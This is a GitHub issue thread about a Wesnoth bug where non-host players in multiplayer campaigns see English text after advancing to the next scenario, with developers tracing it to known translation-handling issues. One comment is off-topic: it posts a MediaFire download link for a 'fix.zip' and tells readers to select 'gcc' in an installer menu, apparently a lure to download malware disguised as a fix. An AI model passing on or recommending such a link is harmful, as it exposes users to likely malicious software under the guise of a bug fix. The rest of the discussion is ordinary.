### ISSUE TITLE
When you proceed to the next scenario of a multiplayer campaign, all non-host players see all texts untranslated in the next scenario

### ISSUE THREAD

**Issue by Discontinuum** [wesnoth/wesnoth#9258]
### Game and System Information

- **Version:** 1.18.0 & 1.18.2

### Description of the bug

When you start a multiplayer campaign, all players have all texts translated as they should. But when you finish the scenario and proceed to the next one, non-host players see English text. Rehosting anew from a start-of-scenario save helps

### Steps to reproduce the behavior

1. Start any MP campaign with all players having a non-English locale (any MP campaign would work: World Conquest, Legend of Wesmere, or any of add-on MP campaigns that have translations)
2. Win the first scenario
3. Click "Next scenario"
4. The host has it translated, the other players see English text
5. If you quit and rehost from the start-of-scenario save, everyone should see translated text again (for a duration of one scenario)

### Expected behavior

Translations work

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by Pentarctagon** [comment]
It might be that that initial scenario cfg is from each local client, but subsequent scenario cfgs are transmitted over the network?

**Comment by Discontinuum** [comment]
Well, it needs to be checked, but I think the initial scenario should also be transmitted. Once we played a scenario over network and then found out that the second player didn't pull the recent changes. But still the scenario worked with the latest changes, because the host had the most recent version (and it had no lua stuff)

**Comment by Pentarctagon** [comment]
The reason I wondered was because simple_wml not handling translations is a known issue (ie: #1420, #3375).

**Comment by gfgtdf** [comment]
yes looks like 1420 to me

**Comment by Wedge009** [comment]
Thanks for finding those issues, because just reading the title of this issue reminded me of those. Which one should be closed?

**Comment by Pentarctagon** [comment]
This one's newer, so I'd say this one.
